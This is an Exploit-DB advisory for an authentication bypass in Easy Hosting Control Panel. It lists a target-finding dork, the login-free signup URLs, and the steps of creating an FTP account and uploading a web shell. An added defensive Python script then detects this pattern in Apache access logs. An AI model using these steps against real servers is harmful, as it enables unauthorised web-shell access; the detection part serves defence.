Easy Hosting Control Panel – Admin Authentication Bypass

  • Author: Jasman
    Date: 2011-10-04
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17926/
  • # Exploit Title: Easy Hosting Control Panel Admin Auth Bypass
    # Google Dork: inurl:/ehcp/?op=applyfordomainaccount
    # Date: 10/04/2011
    # Author: Jasman
    # Software Link: https://launchpad.net/ehcp & http://www.ehcp.net
    # Version: 0.29.10 - 0.29.13
    # Tested on: Ubuntu, Debian
    
    
    + Description
    Easy Hosting Control Panel is designed for hosting multiple domains on a single machine.
    It uses LAMP (Linux, Apache, MySQL, PHP). Its aims: easy to install, easy to use, non-complex, functional.
    
    
    + Vulnerable:
    Adding an FTP account and a domain does not require a login.
    
    http://site.com/vhosts/ehcp/?op=applyforaccount
    http://site.com/vhosts/ehcp/?op=applyforftpaccount
    http://site.com/vhosts/ehcp/?op=applyfordomainaccount
    
    + Exploit
    Upload a shell via FTP
    http://site.com/vhosts/[username]/[domain]/httpdocs/shell.php
    
    + Tested On
    0.29.13
    0.29.11
    0.29.10
    
    
    + Other Link:
    https://bugs.launchpad.net/ehcp/+bug/865889
    
    
    + Thanks to:
    ArRay,`yuda, N4ck0, K4pt3N, samu1241, bejamz, Gameover, antitos, yuki, pokeng, 
    aphe_aphe, jos_ali_joe, BlueBoyz, JFry_, Ihsana'Lab, Anaski Crew, Forum.ExploreCrew
    Exploit-Id, FeeLcoMz All Indonesian Hacker
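
Detection sketch for the behaviour described under "Vulnerable" and "Exploit" above. This is an added example, not part of the original advisory or of the EHCP project: it scans Apache access-log lines for requests to the three login-free operations and for later PHP requests from the same client under a customer httpdocs directory. The log format (Apache common/combined), the sample lines and the function name scan are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Operations the advisory lists as reachable without a login.
UNAUTH_OPS = {"applyforaccount", "applyforftpaccount", "applyfordomainaccount"}

# Apache common/combined log line: client, timestamp, method, URL, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# Customer web-root layout shown in the advisory.
DOCROOT_PHP_RE = re.compile(r"^/vhosts/[^/]+/[^/]+/httpdocs/.*\.php$", re.I)

# Constructed sample log lines (documentation IP ranges, made-up names).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Oct/2011:10:00:01 +0000] "GET /vhosts/ehcp/?op=applyforftpaccount HTTP/1.1" 200 5120',
    '192.0.2.10 - - [04/Oct/2011:10:00:40 +0000] "POST /vhosts/ehcp/?op=applyfordomainaccount HTTP/1.1" 200 812',
    '198.51.100.7 - - [04/Oct/2011:10:01:02 +0000] "GET /vhosts/alice/example.org/httpdocs/index.php HTTP/1.1" 200 2048',
    '192.0.2.10 - - [04/Oct/2011:10:05:13 +0000] "GET /vhosts/newuser/example.net/httpdocs/upload.php HTTP/1.1" 200 64',
    '198.51.100.7 - - [04/Oct/2011:10:06:00 +0000] "GET /vhosts/ehcp/ HTTP/1.1" 200 900',
]


def scan(lines):
    """Return (kind, client, timestamp, url, status) for each suspicious request."""
    findings, signup_clients = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        client, ts, _method, url, status = m.groups()
        parts = urlsplit(url)
        ops = {v.lower() for v in parse_qs(parts.query).get("op", [])}
        if "/ehcp/" in parts.path and ops & UNAUTH_OPS:
            # Request to one of the operations that needs no login.
            signup_clients.add(client)
            findings.append(("unauth-op", client, ts, url, status))
        elif client in signup_clients and DOCROOT_PHP_RE.match(parts.path):
            # Same client later requests PHP inside a customer web root.
            findings.append(("php-after-signup", client, ts, url, status))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

An op value sent only in a POST body does not appear in the access log, so pair this with a review of recently created FTP accounts and domains in the panel.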